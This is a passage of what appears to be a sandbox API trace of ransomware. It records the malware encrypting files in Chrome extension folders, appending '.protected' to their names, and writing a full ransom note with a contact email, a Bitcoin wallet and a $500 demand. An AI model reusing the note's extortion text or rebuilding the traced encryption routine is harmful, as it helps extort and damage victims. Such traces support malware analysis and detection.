out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.602] CloseHandle (hObject=0x164) returned 1 [0083.602] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.602] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0083.602] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0083.602] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0083.602] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0083.602] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0083.602] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi") returned 150 [0083.602] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0083.602] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0083.602] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\*") returned 152 [0083.602] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.603] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.603] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.603] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.603] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.603] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.603] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\.") returned 152 [0083.603] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.603] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.603] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.603] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.603] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.603] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.603] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.603] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\..") returned 153 [0083.603] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.603] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.603] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.603] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.603] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.603] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.603] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.603] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.603] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json") returned 164 [0083.603] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.603] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.603] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.603] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.604] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json") returned 164 [0083.604] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.604] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json") returned 164 [0083.604] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.604] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json") returned 164 [0083.604] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.604] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.605] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.605] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.605] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.607] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.607] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.607] CloseHandle (hObject=0x168) returned 1 [0083.607] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.protected") returned 174 [0083.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.protected")) returned 1 [0083.608] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.608] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.608] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\RESTORE_FILES.txt") returned 168 [0083.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.608] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.608] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.609] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.609] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.609] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.609] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.609] CloseHandle (hObject=0x164) returned 1 [0083.609] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.609] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0083.609] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0083.609] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0083.609] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") returned 1 [0083.609] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0083.609] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr") returned 150 [0083.610] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0083.610] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0083.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\*") returned 152 [0083.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.610] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.610] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.610] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.610] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.610] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\.") returned 152 [0083.610] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.610] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.610] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.610] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.610] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.610] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.610] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\..") returned 153 [0083.610] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.610] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.610] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.610] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.610] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.610] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.610] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.610] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json") returned 164 [0083.610] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.610] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json") returned 164 [0083.611] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json") returned 164 [0083.611] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json") returned 164 [0083.611] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.611] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.614] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.614] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.618] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.618] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.619] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.619] CloseHandle (hObject=0x168) returned 1 [0083.619] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.protected") returned 174 [0083.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.protected")) returned 1 [0083.620] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.620] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.620] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\RESTORE_FILES.txt") returned 168 [0083.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.622] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.622] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.623] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.623] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.623] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.623] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 